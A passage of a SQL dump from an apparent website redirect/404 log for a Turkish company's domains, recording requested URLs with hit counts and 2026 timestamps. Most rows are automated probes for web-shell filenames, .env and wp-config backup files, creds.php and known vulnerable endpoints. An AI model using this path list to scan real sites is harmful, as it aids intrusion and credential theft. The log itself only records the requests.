17:36:24','0000-00-00 00:00:00',301),(63889,'http://3s-technologies.com.tr/tr/loading.php',NULL,'','',1,0,'2026-04-27 17:36:25','0000-00-00 00:00:00',301),(63890,'http://3s-technologies.com.tr/tr/phpcheck.php',NULL,'','',1,0,'2026-04-27 17:36:30','0000-00-00 00:00:00',301),(63891,'http://3s-technologies.com.tr/tr/filesystems.php',NULL,'','',1,0,'2026-04-27 17:36:31','0000-00-00 00:00:00',301),(63892,'https://3s-technologies.com.tr/tr/rest/v1/store/storeconfigs',NULL,'https://3s-technologies.com.tr/rest/V1/store/storeConfigs','',1,0,'2026-04-28 02:21:45','0000-00-00 00:00:00',301),(63893,'https://3s-technologies.com.tr/tr/rest/default/v1/store/storeconfigs',NULL,'https://3s-technologies.com.tr/rest/default/V1/store/storeConfigs','',1,0,'2026-04-28 02:21:46','0000-00-00 00:00:00',301),(63894,'http://3s-technologies.com.tr/tr/academy.php',NULL,'','',5,0,'2026-04-28 07:06:11','0000-00-00 00:00:00',301),(63895,'http://3s-technologies.com.tr/tr/wp-bonbon.php',NULL,'','',3,0,'2026-04-28 07:06:30','0000-00-00 00:00:00',301),(63896,'http://3s-technologies.com.tr/tr/wp-firewall.php',NULL,'','',7,0,'2026-04-28 07:06:32','0000-00-00 00:00:00',301),(63897,'http://mail.3s-technologies.com.tr/tr/.env.php.dist',NULL,'','',2,0,'2026-04-28 07:10:02','0000-00-00 00:00:00',301),(63898,'http://mail.3s-technologies.com.tr/tr/wp-system.php',NULL,'','',2,0,'2026-04-28 07:10:03','0000-00-00 00:00:00',301),(63899,'http://mail.3s-technologies.com.tr/tr/user-edit.php',NULL,'','',2,0,'2026-04-28 07:10:04','0000-00-00 00:00:00',301),(63900,'http://mail.3s-technologies.com.tr/tr/white.php',NULL,'','',2,0,'2026-04-28 07:10:08','0000-00-00 00:00:00',301),(63901,'http://mail.3s-technologies.com.tr/tr/edit-comments.php',NULL,'','',1,0,'2026-04-28 07:10:11','0000-00-00 00:00:00',301),(63902,'https://3s-technologies.com.tr/tr/kargo',NULL,'','',2,0,'2026-04-28 11:30:00','0000-00-00 00:00:00',301),(63903,'https://3s-technologies.com.tr/tr/iade',NULL,'','',2,0,'2026-04-28 11:30:00','0000-00-00 00:00:00',301),(63904,'https://3s-technologies.com.tr/tr/teslimat',NULL,'','',2,0,'2026-04-28 11:30:01','0000-00-00 00:00:00',301),(63905,'https://3s-technologies.com.tr/tr/sss',NULL,'','',2,0,'2026-04-28 11:30:02','0000-00-00 00:00:00',301),(63906,'http://3s-technologies.com.tr/tr/puvil.php',NULL,'','',2,0,'2026-04-28 15:19:43','0000-00-00 00:00:00',301),(63907,'http://3s-technologies.com.tr/tr/oylki.php',NULL,'','',1,0,'2026-04-28 15:19:58','0000-00-00 00:00:00',301),(63908,'http://3s-technologies.com.tr/tr/wp-at.php',NULL,'','',5,0,'2026-04-28 15:20:08','0000-00-00 00:00:00',301),(63909,'http://3s-technologies.com.tr/tr/lco.php',NULL,'','',1,0,'2026-04-28 15:20:10','0000-00-00 00:00:00',301),(63910,'http://3s-technologies.com.tr/tr/huyaa.php',NULL,'','',1,0,'2026-04-28 15:20:12','0000-00-00 00:00:00',301),(63911,'http://3s-technologies.com.tr/tr/wp-acc.php',NULL,'','',1,0,'2026-04-28 15:20:26','0000-00-00 00:00:00',301),(63912,'http://3s-technologies.com.tr/tr/row.php',NULL,'','',1,0,'2026-04-28 15:20:31','0000-00-00 00:00:00',301),(63913,'http://3s-technologies.com.tr/tr/bdroot.php',NULL,'','',2,0,'2026-04-28 15:20:39','0000-00-00 00:00:00',301),(63914,'http://3s-technologies.com.tr/tr/lgr.php',NULL,'','',1,0,'2026-04-28 15:20:46','0000-00-00 00:00:00',301),(63915,'http://3s-technologies.com.tr/tr/wp_ok.php',NULL,'','',1,0,'2026-04-28 15:20:48','0000-00-00 00:00:00',301),(63916,'http://3s-technologies.com.tr/tr/zicgg.php',NULL,'','',2,0,'2026-04-28 15:20:53','0000-00-00 00:00:00',301),(63917,'http://3s-technologies.com.tr/tr/xenon1337.php',NULL,'','',6,0,'2026-04-28 15:20:55','0000-00-00 00:00:00',301),(63918,'http://3s-technologies.com.tr/tr/cvrvk.php',NULL,'','',2,0,'2026-04-28 15:21:00','0000-00-00 00:00:00',301),(63919,'http://3s-technologies.com.tr/tr/clirp.php',NULL,'','',2,0,'2026-04-28 15:21:23','0000-00-00 00:00:00',301),(63920,'http://3s-technologies.com.tr/tr/wkdec.php',NULL,'','',2,0,'2026-04-28 15:21:24','0000-00-00 00:00:00',301),(63921,'http://3s-technologies.com.tr/tr/zzkhe.php',NULL,'','',2,0,'2026-04-28 15:21:34','0000-00-00 00:00:00',301),(63922,'http://3s-technologies.com.tr/tr/tires.php',NULL,'','',20,0,'2026-04-28 15:21:37','0000-00-00 00:00:00',301),(63923,'http://3s-technologies.com.tr/tr/wuasr.php',NULL,'','',6,0,'2026-04-28 15:21:40','0000-00-00 00:00:00',301),(63924,'http://3s-technologies.com.tr/tr/wp-sx10.php',NULL,'','',2,0,'2026-04-28 15:21:47','0000-00-00 00:00:00',301),(63925,'https://3s-technologies.com.tr/tr/api/',NULL,'','',2,0,'2026-04-28 19:27:59','0000-00-00 00:00:00',301),(63926,'https://3s-technologies.com.tr/tr/_next/',NULL,'','',2,0,'2026-04-28 19:28:02','0000-00-00 00:00:00',301),(63927,'https://3s-technologies.com.tr/api/',NULL,'','',2,0,'2026-04-28 19:28:02','0000-00-00 00:00:00',301),(63928,'https://3s-technologies.com.tr/tr/api/auth/',NULL,'','',2,0,'2026-04-28 19:28:02','0000-00-00 00:00:00',301),(63929,'https://3s-technologies.com.tr/_next/',NULL,'','',1,0,'2026-04-28 19:28:03','0000-00-00 00:00:00',301),(63930,'https://3s-technologies.com.tr/tr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings',NULL,'https://3s-technologies.com.tr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings','',4,0,'2026-04-28 19:30:45','0000-00-00 00:00:00',301),(63931,'https://www.3s-technologies.com.tr/tr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings',NULL,'https://www.3s-technologies.com.tr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings','',1,0,'2026-04-28 21:17:13','0000-00-00 00:00:00',301),(63932,'https://www.3s-technologies.com.tr/tr/\"/media/system/js/html5fallback.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/system/js/html5fallback.js?59b9a97f81c129b0e3167385c8580231\"','',1,0,'2026-04-28 21:17:21','0000-00-00 00:00:00',301),(63933,'http://3s-technologies.com.tr/tr/xse.php',NULL,'','',1,0,'2026-04-29 00:37:13','0000-00-00 00:00:00',301),(63934,'http://3s-technologies.com.tr/tr/zzx.php',NULL,'','',2,0,'2026-04-29 00:37:14','0000-00-00 00:00:00',301),(63935,'http://3s-technologies.com.tr/tr/rasse.php',NULL,'','',2,0,'2026-04-29 00:37:18','0000-00-00 00:00:00',301),(63936,'http://mail.3s-technologies.com.tr/tr/wp-config.php.swo',NULL,'','',1,0,'2026-04-29 21:43:13','0000-00-00 00:00:00',301),(63937,'https://www.3s-technologies.com.tr/tr/secure/.env',NULL,'https://www.3s-technologies.com.tr/secure/.env','',1,0,'2026-04-30 07:00:07','0000-00-00 00:00:00',301),(63938,'http://3s-technologies.com.tr/tr/creds.php',NULL,'','',2,0,'2026-04-30 09:51:50','0000-00-00 00:00:00',301),(63939,'http://3s-technologies.com.tr/tr/phpstatus.php',NULL,'','',2,0,'2026-04-30 09:51:51','0000-00-00 00:00:00',301),(63940,'http://3s-technologies.com.tr/tr/system_check.php',NULL,'','',1,0,'2026-04-30 09:51:52','0000-00-00 00:00:00',301),(63941,'http://3s-technologies.com.tr/tr/setup-verify.php',NULL,'','',1,0,'2026-04-30 09:51:54','0000-00-00 00:00:00',301),(63942,'http://3s-technologies.com.tr/tr/php-ver.php',NULL,'','',1,0,'2026-04-30 09:51:56','0000-00-00 00:00:00',301),(63943,'http://3s-technologies.com.tr/tr/eval-stdin.php',NULL,'','',1,0,'2026-04-30 09:51:57','0000-00-00 00:00:00',301),(63944,'http://3s-technologies.com.tr/tr/module-info.php',NULL,'','',1,0,'2026-04-30 09:52:00','0000-00-00 00:00:00',301),(63945,'http://3s-technologies.com.tr/tr/teste.php',NULL,'','',2,0,'2026-04-30 09:52:01','0000-00-00 00:00:00',301),(63946,'http://3s-technologies.com.tr/tr/pdf.php',NULL,'','',2,0,'2026-04-30 09:52:01','0000-00-00 00:00:00',301),(63947,'http://3s-technologies.com.tr/tr/album.php',NULL,'','',2,0,'2026-04-30 09:52:02','0000-00-00 00:00:00',301),(63948,'http://3s-technologies.com.tr/tr/phpprobe.php',NULL,'','',2,0,'2026-04-30 09:52:03','0000-00-00 00:00:00',301),(63949,'http://3s-technologies.com.tr/tr/timeclock.php',NULL,'','',2,0,'2026-04-30 09:52:03','0000-00-00 00:00:00',301),(63950,'http://3s-technologies.com.tr/tr/php_release.php',NULL,'','',1,0,'2026-04-30 09:52:04','0000-00-00 00:00:00',301),(63951,'http://3s-technologies.com.tr/tr/profiler.php',NULL,'','',2,0,'2026-04-30 09:52:05','0000-00-00 00:00:00',301),(63952,'http://3s-technologies.com.tr/tr/lmfi2.php',NULL,'','',2,0,'2026-04-30 09:52:07','0000-00-00 00:00:00',301),(63953,'http://3s-technologies.com.tr/tr/wp-tinymce.php',NULL,'','',1,0,'2026-04-30 09:52:09','0000-00-00 00:00:00',301),(63954,'http://3s-technologies.com.tr/tr/info_page.php',NULL,'','',1,0,'2026-04-30 09:52:10','0000-00-00 00:00:00',301),(63955,'http://3s-technologies.com.tr/tr/mimes.php',NULL,'','',2,0,'2026-04-30 09:52:11','0000-00-00 00:00:00',301),(63956,'http://3s-technologies.com.tr/tr/.env.test.php',NULL,'','',1,0,'2026-04-30 09:52:15','0000-00-00 00:00:00',301),(63957,'http://3s-technologies.com.tr/tr/php-fpm.php',NULL,'','',1,0,'2026-04-30 09:52:16','0000-00-00 00:00:00',301),(63958,'http://3s-technologies.com.tr/tr/debug-php.php',NULL,'','',1,0,'2026-04-30 09:52:17','0000-00-00 00:00:00',301),(63959,'http://mail.3s-technologies.com.tr/tr/creds.php',NULL,'','',1,0,'2026-05-01 04:16:43','0000-00-00 00:00:00',301),(63960,'http://mail.3s-technologies.com.tr/tr/phpstatus.php',NULL,'','',1,0,'2026-05-01 04:16:44','0000-00-00 00:00:00',301),(63961,'http://mail.3s-technologies.com.tr/tr/system_check.php',NULL,'','',1,0,'2026-05-01 04:16:45','0000-00-00 00:00:00',301),(63962,'http://mail.3s-technologies.com.tr/tr/search.php',NULL,'','',1,0,'2026-05-01 04:16:46','0000-00-00 00:00:00',301),(63963,'http://mail.3s-technologies.com.tr/tr/setup-verify.php',NULL,'','',1,0,'2026-05-01 04:16:47','0000-00-00 00:00:00',301),(63964,'http://mail.3s-technologies.com.tr/tr/xinfo.php',NULL,'','',1,0,'2026-05-01 04:16:48','0000-00-00 00:00:00',301),(63965,'http://mail.3s-technologies.com.tr/tr/php-ver.php',NULL,'','',1,0,'2026-05-01 04:16:49','0000-00-00 00:00:00',301),(63966,'http://mail.3s-technologies.com.tr/tr/eval-stdin.php',NULL,'','',1,0,'2026-05-01 04:16:49','0000-00-00 00:00:00',301),(63967,'http://mail.3s-technologies.com.tr/tr/you.php',NULL,'','',1,0,'2026-05-01 04:16:50','0000-00-00 00:00:00',301),(63968,'http://mail.3s-technologies.com.tr/tr/module-info.php',NULL,'','',1,0,'2026-05-01 04:16:51','0000-00-00 00:00:00',301),(63969,'http://mail.3s-technologies.com.tr/tr/teste.php',NULL,'','',1,0,'2026-05-01 04:16:52','0000-00-00 00:00:00',301),(63970,'http://mail.3s-technologies.com.tr/tr/pdf.php',NULL,'','',1,0,'2026-05-01 04:16:53','0000-00-00 00:00:00',301),(63971,'http://mail.3s-technologies.com.tr/tr/album.php',NULL,'','',1,0,'2026-05-01 04:16:54','0000-00-00 00:00:00',301),(63972,'http://mail.3s-technologies.com.tr/tr/phpprobe.php',NULL,'','',1,0,'2026-05-01 04:16:54','0000-00-00 00:00:00',301),(63973,'http://mail.3s-technologies.com.tr/tr/timeclock.php',NULL,'','',1,0,'2026-05-01 04:16:55','0000-00-00 00:00:00',301),(63974,'http://mail.3s-technologies.com.tr/tr/php_release.php',NULL,'','',1,0,'2026-05-01 04:16:56','0000-00-00 00:00:00',301),(63975,'http://mail.3s-technologies.com.tr/tr/profiler.php',NULL,'','',1,0,'2026-05-01 04:16:56','0000-00-00 00:00:00',301),(63976,'http://mail.3s-technologies.com.tr/tr/wp-tinymce.php',NULL,'','',1,0,'2026-05-01 04:17:00','0000-00-00 00:00:00',301),(63977,'http://mail.3s-technologies.com.tr/tr/info_page.php',NULL,'','',1,0,'2026-05-01 04:17:01','0000-00-00 00:00:00',301),(63978,'http://mail.3s-technologies.com.tr/tr/mimes.php',NULL,'','',1,0,'2026-05-01 04:17:02','0000-00-00 00:00:00',301),(63979,'http://mail.3s-technologies.com.tr/tr/u.php',NULL,'','',1,0,'2026-05-01 04:17:04','0000-00-00 00:00:00',301),(63980,'http://mail.3s-technologies.com.tr/tr/.env.test.php',NULL,'','',1,0,'2026-05-01 04:17:05','0000-00-00 00:00:00',301),(63981,'http://mail.3s-technologies.com.tr/tr/php-fpm.php',NULL,'','',1,0,'2026-05-01 04:17:06','0000-00-00 00:00:00',301),(63982,'http://mail.3s-technologies.com.tr/tr/conf.php',NULL,'','',1,0,'2026-05-01 04:17:07','0000-00-00 00:00:00',301),(63983,'http://mail.3s-technologies.com.tr/tr/debug-php.php',NULL,'','',1,0,'2026-05-01 04:17:08','0000-00-00 00:00:00',301),(63984,'http://mail.3s-technologies.com.tr/tr/yindu.php',NULL,'','',1,0,'2026-05-01 04:17:08','0000-00-00 00:00:00',301),(63985,'http://3s-technologies.com.tr/en/events.html',NULL,'','',1,0,'2026-05-01 12:04:23','0000-00-00 00:00:00',301),(63986,'http://3s-technologies.com.tr/tr/olik.php',NULL,'','',2,0,'2026-05-01 16:57:02','0000-00-00 00:00:00',301),(63987,'http://3s-technologies.com.tr/tr/atika.php',NULL,'','',2,0,'2026-05-01 16:57:05','0000-00-00 00:00:00',301),(63988,'http://3s-technologies.com.tr/tr/wpxml.php',NULL,'','',7,0,'2026-05-01 16:57:06','0000-00-00 00:00:00',301),(63989,'http://3s-technologies.com.tr/tr/bob.php',NULL,'','',10,0,'2026-05-01 16:57:07','0000-00-00 00:00:00',301),(63990,'http://3s-technologies.com.tr/tr/spawns.php',NULL,'','',4,0,'2026-05-01 16:57:07','0000-00-00 00:00:00',301),(63991,'http://3s-technologies.com.tr/tr/xeaq.php',NULL,'','',2,0,'2026-05-01 16:57:40','0000-00-00 00:00:00',301),(63992,'http://3s-technologies.com.tr/tr/up2.php',NULL,'','',2,0,'2026-05-01 16:57:40','0000-00-00 00:00:00',301),(63993,'http://mail.3s-technologies.com.tr/tr/bdroot.php',NULL,'','',1,0,'2026-05-02 21:19:45','0000-00-00 00:00:00',301),(63994,'http://mail.3s-technologies.com.tr/tr/olik.php',NULL,'','',1,0,'2026-05-02 21:19:46','0000-00-00 00:00:00',301),(63995,'http://mail.3s-technologies.com.tr/tr/.well-known/about.php',NULL,'','',2,0,'2026-05-02 21:19:48','0000-00-00 00:00:00',301),(63996,'http://mail.3s-technologies.com.tr/tr/atika.php',NULL,'','',1,0,'2026-05-02 21:19:50','0000-00-00 00:00:00',301),(63997,'http://mail.3s-technologies.com.tr/tr/wpxml.php',NULL,'','',4,0,'2026-05-02 21:19:52','0000-00-00 00:00:00',301),(63998,'http://mail.3s-technologies.com.tr/tr/bob.php',NULL,'','',5,0,'2026-05-02 21:19:53','0000-00-00 00:00:00',301),(63999,'http://mail.3s-technologies.com.tr/tr/spawns.php',NULL,'','',1,0,'2026-05-02 21:19:54','0000-00-00 00:00:00',301),(64000,'http://mail.3s-technologies.com.tr/tr/xeaq.php',NULL,'','',1,0,'2026-05-02 21:20:42','0000-00-00 00:00:00',301),(64001,'http://mail.3s-technologies.com.tr/tr/up2.php',NULL,'','',1,0,'2026-05-02 21:20:43','0000-00-00 00:00:00',301),(64002,'http://www.3s-technologies.com.tr/en/wp-admin/load-scripts.php',NULL,'','',1,0,'2026-05-03 11:34:24','0000-00-00 00:00:00',301),(64003,'http://www.3s-technologies.com.tr/en/wp-admin/load-styles.php',NULL,'','',1,0,'2026-05-03 11:34:25','0000-00-00 00:00:00',301),(64004,'http://www.3s-technologies.com.tr/en/wp-includes/js/jquery/jquery.js',NULL,'','',1,0,'2026-05-03 11:34:27','0000-00-00 00:00:00',301),(64005,'http://www.3s-technologies.com.tr/en/wp-includes/css/dashicons.css',NULL,'','',1,0,'2026-05-03 11:34:28','0000-00-00 00:00:00',301),(64006,'http://www.3s-technologies.com.tr/en/wp-content/themes',NULL,'','',1,0,'2026-05-03 11:34:29','0000-00-00 00:00:00',301),(64007,'http://www.3s-technologies.com.tr/en/wp-content/plugins',NULL,'','',1,0,'2026-05-03 11:34:30','0000-00-00 00:00:00',301),(64008,'http://www.3s-technologies.com.tr/en/wp-includes/version.php',NULL,'','',1,0,'2026-05-03 11:34:32','0000-00-00 00:00:00',301),(64009,'http://www.3s-technologies.com.tr/en/wp-includes/class-wp.php',NULL,'','',1,0,'2026-05-03 11:34:33','0000-00-00 00:00:00',301),(64010,'http://www.3s-technologies.com.tr/en/wp-includes/option.php',NULL,'','',1,0,'2026-05-03 11:34:35','0000-00-00 00:00:00',301),(64011,'http://www.3s-technologies.com.tr/en/wp-includes/post.php',NULL,'','',1,0,'2026-05-03 11:34:36','0000-00-00 00:00:00',301),(64012,'http://www.3s-technologies.com.tr/en/wp-includes/user.php',NULL,'','',1,0,'2026-05-03 11:34:37','0000-00-00 00:00:00',301),(64013,'http://www.3s-technologies.com.tr/en/wp-json',NULL,'','',1,0,'2026-05-03 11:34:38','0000-00-00 00:00:00',301),(64014,'http://www.3s-technologies.com.tr/en/wp-json/wp/v2',NULL,'','',1,0,'2026-05-03 11:34:39','0000-00-00 00:00:00',301),(64015,'http://www.3s-technologies.com.tr/en/wp-json/oembed/1.0/embed',NULL,'','',1,0,'2026-05-03 11:34:40','0000-00-00 00:00:00',301),(64016,'http://www.3s-technologies.com.tr/en/wp-json/wp/v2/posts',NULL,'','',1,0,'2026-05-03 11:34:41','0000-00-00 00:00:00',301),(64017,'http://www.3s-technologies.com.tr/en/wp-json/wp/v2/pages',NULL,'','',1,0,'2026-05-03 11:34:41','0000-00-00 00:00:00',301),(64018,'http://www.3s-technologies.com.tr/en/wp-json/wp/v2/media',NULL,'','',1,0,'2026-05-03 11:34:42','0000-00-00 00:00:00',301),(64019,'http://www.3s-technologies.com.tr/en/wp-json/wp/v2/categories',NULL,'','',1,0,'2026-05-03 11:34:43','0000-00-00 00:00:00',301),(64020,'http://www.3s-technologies.com.tr/en/wp-json/wp/v2/tags',NULL,'','',1,0,'2026-05-03 11:34:44','0000-00-00 00:00:00',301),(64021,'http://www.3s-technologies.com.tr/en/wp-content/uploads',NULL,'','',1,0,'2026-05-03 11:34:46','0000-00-00 00:00:00',301),(64022,'http://www.3s-technologies.com.tr/en/wp-content/themes/twentytwenty',NULL,'','',1,0,'2026-05-03 11:34:47','0000-00-00 00:00:00',301),(64023,'http://www.3s-technologies.com.tr/en/wp-content/themes/twentytwentyone',NULL,'','',1,0,'2026-05-03 11:34:48','0000-00-00 00:00:00',301),(64024,'http://www.3s-technologies.com.tr/en/wp-content/themes/twentytwentytwo',NULL,'','',1,0,'2026-05-03 11:34:49','0000-00-00 00:00:00',301),(64025,'http://www.3s-technologies.com.tr/en/wp-content/themes/twentytwentythree',NULL,'','',1,0,'2026-05-03 11:34:50','0000-00-00 00:00:00',301),(64026,'http://www.3s-technologies.com.tr/en/wp-content/plugins/hello.php',NULL,'','',1,0,'2026-05-03 11:34:51','0000-00-00 00:00:00',301),(64027,'http://www.3s-technologies.com.tr/en/wp-content/plugins/akismet',NULL,'','',1,0,'2026-05-03 11:34:52','0000-00-00 00:00:00',301),(64028,'http://www.3s-technologies.com.tr/en/wp-includes/images/w-logo-blue.png',NULL,'','',1,0,'2026-05-03 11:34:53','0000-00-00 00:00:00',301),(64029,'http://www.3s-technologies.com.tr/en/feed/rss',NULL,'','',1,0,'2026-05-03 11:34:56','0000-00-00 00:00:00',301),(64030,'http://www.3s-technologies.com.tr/en/feed/rss2',NULL,'','',1,0,'2026-05-03 11:34:57','0000-00-00 00:00:00',301),(64031,'http://www.3s-technologies.com.tr/en/feed/atom',NULL,'','',1,0,'2026-05-03 11:34:58','0000-00-00 00:00:00',301),(64032,'https://mail.3s-technologies.com.tr/en/favicon.png',NULL,'','',4,0,'2026-05-03 17:45:56','0000-00-00 00:00:00',301),(64033,'https://3s-technologies.com.tr/en/favicon.png',NULL,'','',1,0,'2026-05-03 17:45:58','0000-00-00 00:00:00',301),(64034,'http://mail.3s-technologies.com.tr/en/favicon.png',NULL,'','',1,0,'2026-05-03 17:45:58','0000-00-00 00:00:00',301),(64035,'http://3s-technologies.com.tr/tr/wp-lacoto.php',NULL,'','',2,0,'2026-05-04 03:08:50','0000-00-00 00:00:00',301),(64036,'http://3s-technologies.com.tr/tr/wp-x1s2e6h3p7.php',NULL,'','',2,0,'2026-05-04 03:08:53','0000-00-00 00:00:00',301),(64037,'http://3s-technologies.com.tr/tr/aj11.php',NULL,'','',7,0,'2026-05-04 03:08:56','0000-00-00 00:00:00',301),(64038,'http://3s-technologies.com.tr/tr/qhupyoon.php',NULL,'','',2,0,'2026-05-04 03:09:07','0000-00-00 00:00:00',301),(64039,'http://3s-technologies.com.tr/tr/atkno.php',NULL,'','',4,0,'2026-05-04 03:09:14','0000-00-00 00:00:00',301),(64040,'http://3s-technologies.com.tr/tr/ptanf.php',NULL,'','',2,0,'2026-05-04 03:09:19','0000-00-00 00:00:00',301),(64041,'http://3s-technologies.com.tr/tr/index0.php',NULL,'','',6,0,'2026-05-04 03:09:23','0000-00-00 00:00:00',301),(64042,'http://3s-technologies.com.tr/tr/fkohd.php',NULL,'','',2,0,'2026-05-04 03:09:25','0000-00-00 00:00:00',301),(64043,'http://3s-technologies.com.tr/tr/wpconf.php',NULL,'','',4,0,'2026-05-04 03:09:33','0000-00-00 00:00:00',301),(64044,'http://3s-technologies.com.tr/tr/rivasqup.php',NULL,'','',2,0,'2026-05-04 03:09:40','0000-00-00 00:00:00',301),(64045,'http://3s-technologies.com.tr/tr/dshtv.php',NULL,'','',2,0,'2026-05-04 03:09:41','0000-00-00 00:00:00',301),(64046,'http://3s-technologies.com.tr/tr/zhw.php',NULL,'','',2,0,'2026-05-04 03:09:47','0000-00-00 00:00:00',301),(64047,'http://3s-technologies.com.tr/tr/knw.php',NULL,'','',2,0,'2026-05-04 03:09:51','0000-00-00 00:00:00',301),(64048,'http://3s-technologies.com.tr/tr/wp-k7djufwez2.php',NULL,'','',5,0,'2026-05-04 03:09:53','0000-00-00 00:00:00',301),(64049,'http://3s-technologies.com.tr/tr/wp-tiroto.php',NULL,'','',5,0,'2026-05-04 03:09:54','0000-00-00 00:00:00',301),(64050,'http://3s-technologies.com.tr/tr/son.php',NULL,'','',7,0,'2026-05-04 03:09:55','0000-00-00 00:00:00',301),(64051,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/options.php',NULL,'','',4,0,'2026-05-04 03:10:00','0000-00-00 00:00:00',301),(64052,'http://3s-technologies.com.tr/tr/tramuibs.php',NULL,'','',5,0,'2026-05-04 03:10:04','0000-00-00 00:00:00',301),(64053,'http://3s-technologies.com.tr/tr/bpxrn.php',NULL,'','',2,0,'2026-05-04 03:10:07','0000-00-00 00:00:00',301),(64054,'http://3s-technologies.com.tr/tr/sky.php',NULL,'','',9,0,'2026-05-04 03:10:09','0000-00-00 00:00:00',301),(64055,'http://3s-technologies.com.tr/tr/bojcdooq.php',NULL,'','',2,0,'2026-05-04 03:10:10','0000-00-00 00:00:00',301),(64056,'http://3s-technologies.com.tr/tr/zdd.php',NULL,'','',7,0,'2026-05-04 03:10:11','0000-00-00 00:00:00',301),(64057,'http://3s-technologies.com.tr/tr/cdxadmin.php',NULL,'','',5,0,'2026-05-04 03:10:18','0000-00-00 00:00:00',301),(64058,'http://3s-technologies.com.tr/tr/seyv.php',NULL,'','',2,0,'2026-05-04 03:10:22','0000-00-00 00:00:00',301),(64059,'http://3s-technologies.com.tr/tr/sad8rd1.php',NULL,'','',2,0,'2026-05-04 03:10:24','0000-00-00 00:00:00',301),(64060,'http://3s-technologies.com.tr/tr/sder5252u.php',NULL,'','',2,0,'2026-05-04 03:10:28','0000-00-00 00:00:00',301),(64061,'http://3s-technologies.com.tr/tr/sderty5u.php',NULL,'','',2,0,'2026-05-04 03:10:28','0000-00-00 00:00:00',301),(64062,'http://3s-technologies.com.tr/tr/checkout.php',NULL,'','',2,0,'2026-05-04 03:10:32','0000-00-00 00:00:00',301),(64063,'http://3s-technologies.com.tr/tr/fictioner.php',NULL,'','',2,0,'2026-05-04 03:10:33','0000-00-00 00:00:00',301),(64064,'http://3s-technologies.com.tr/tr/bc.php',NULL,'','',9,0,'2026-05-04 03:10:39','0000-00-00 00:00:00',301),(64065,'http://3s-technologies.com.tr/tr/x402.php',NULL,'','',7,0,'2026-05-04 03:10:42','0000-00-00 00:00:00',301),(64066,'http://mail.3s-technologies.com.tr/tr/wp-lacoto.php',NULL,'','',1,0,'2026-05-04 08:28:24','0000-00-00 00:00:00',301),(64067,'http://mail.3s-technologies.com.tr/tr/wp-x1s2e6h3p7.php',NULL,'','',1,0,'2026-05-04 08:28:27','0000-00-00 00:00:00',301),(64068,'http://mail.3s-technologies.com.tr/tr/aj11.php',NULL,'','',5,0,'2026-05-04 08:28:30','0000-00-00 00:00:00',301),(64069,'http://mail.3s-technologies.com.tr/tr/tires.php',NULL,'','',9,0,'2026-05-04 08:28:31','0000-00-00 00:00:00',301),(64070,'http://mail.3s-technologies.com.tr/tr/xroot.php',NULL,'','',1,0,'2026-05-04 08:28:32','0000-00-00 00:00:00',301),(64071,'http://mail.3s-technologies.com.tr/tr/qhupyoon.php',NULL,'','',1,0,'2026-05-04 08:28:43','0000-00-00 00:00:00',301),(64072,'http://mail.3s-technologies.com.tr/tr/atkno.php',NULL,'','',1,0,'2026-05-04 08:28:54','0000-00-00 00:00:00',301),(64073,'http://mail.3s-technologies.com.tr/tr/de.php',NULL,'','',6,0,'2026-05-04 08:28:55','0000-00-00 00:00:00',301),(64074,'http://mail.3s-technologies.com.tr/tr/ptanf.php',NULL,'','',1,0,'2026-05-04 08:28:59','0000-00-00 00:00:00',301),(64075,'http://mail.3s-technologies.com.tr/tr/axe.php',NULL,'','',5,0,'2026-05-04 08:29:03','0000-00-00 00:00:00',301),(64076,'http://mail.3s-technologies.com.tr/tr/index0.php',NULL,'','',3,0,'2026-05-04 08:29:04','0000-00-00 00:00:00',301),(64077,'http://mail.3s-technologies.com.tr/tr/fkohd.php',NULL,'','',1,0,'2026-05-04 08:29:06','0000-00-00 00:00:00',301),(64078,'http://mail.3s-technologies.com.tr/tr/zo.php',NULL,'','',6,0,'2026-05-04 08:29:09','0000-00-00 00:00:00',301),(64079,'http://mail.3s-technologies.com.tr/tr/wpconf.php',NULL,'','',2,0,'2026-05-04 08:29:15','0000-00-00 00:00:00',301),(64080,'http://mail.3s-technologies.com.tr/tr/jodohghi.php',NULL,'','',1,0,'2026-05-04 08:29:20','0000-00-00 00:00:00',301),(64081,'http://mail.3s-technologies.com.tr/tr/rivasqup.php',NULL,'','',1,0,'2026-05-04 08:29:23','0000-00-00 00:00:00',301),(64082,'http://mail.3s-technologies.com.tr/tr/dshtv.php',NULL,'','',1,0,'2026-05-04 08:29:24','0000-00-00 00:00:00',301),(64083,'http://mail.3s-technologies.com.tr/tr/bbny.php',NULL,'','',1,0,'2026-05-04 08:29:29','0000-00-00 00:00:00',301),(64084,'http://mail.3s-technologies.com.tr/tr/zhw.php',NULL,'','',1,0,'2026-05-04 08:29:31','0000-00-00 00:00:00',301),(64085,'http://mail.3s-technologies.com.tr/tr/knw.php',NULL,'','',1,0,'2026-05-04 08:29:34','0000-00-00 00:00:00',301),(64086,'http://mail.3s-technologies.com.tr/tr/wp-k7djufwez2.php',NULL,'','',3,0,'2026-05-04 08:29:36','0000-00-00 00:00:00',301),(64087,'http://mail.3s-technologies.com.tr/tr/wp-tiroto.php',NULL,'','',3,0,'2026-05-04 08:29:37','0000-00-00 00:00:00',301),(64088,'http://mail.3s-technologies.com.tr/tr/son.php',NULL,'','',4,0,'2026-05-04 08:29:38','0000-00-00 00:00:00',301),(64089,'http://mail.3s-technologies.com.tr/tr/filefuns.php',NULL,'','',1,0,'2026-05-04 08:29:41','0000-00-00 00:00:00',301),(64090,'http://mail.3s-technologies.com.tr/tr/wp-includes/theme-compat/options.php',NULL,'','',2,0,'2026-05-04 08:29:44','0000-00-00 00:00:00',301),(64091,'http://mail.3s-technologies.com.tr/tr/tramuibs.php',NULL,'','',3,0,'2026-05-04 08:29:50','0000-00-00 00:00:00',301),(64092,'http://mail.3s-technologies.com.tr/tr/bpxrn.php',NULL,'','',1,0,'2026-05-04 08:29:52','0000-00-00 00:00:00',301),(64093,'http://mail.3s-technologies.com.tr/tr/sky.php',NULL,'','',6,0,'2026-05-04 08:29:55','0000-00-00 00:00:00',301),(64094,'http://mail.3s-technologies.com.tr/tr/bojcdooq.php',NULL,'','',1,0,'2026-05-04 08:29:55','0000-00-00 00:00:00',301),(64095,'http://mail.3s-technologies.com.tr/tr/zdd.php',NULL,'','',4,0,'2026-05-04 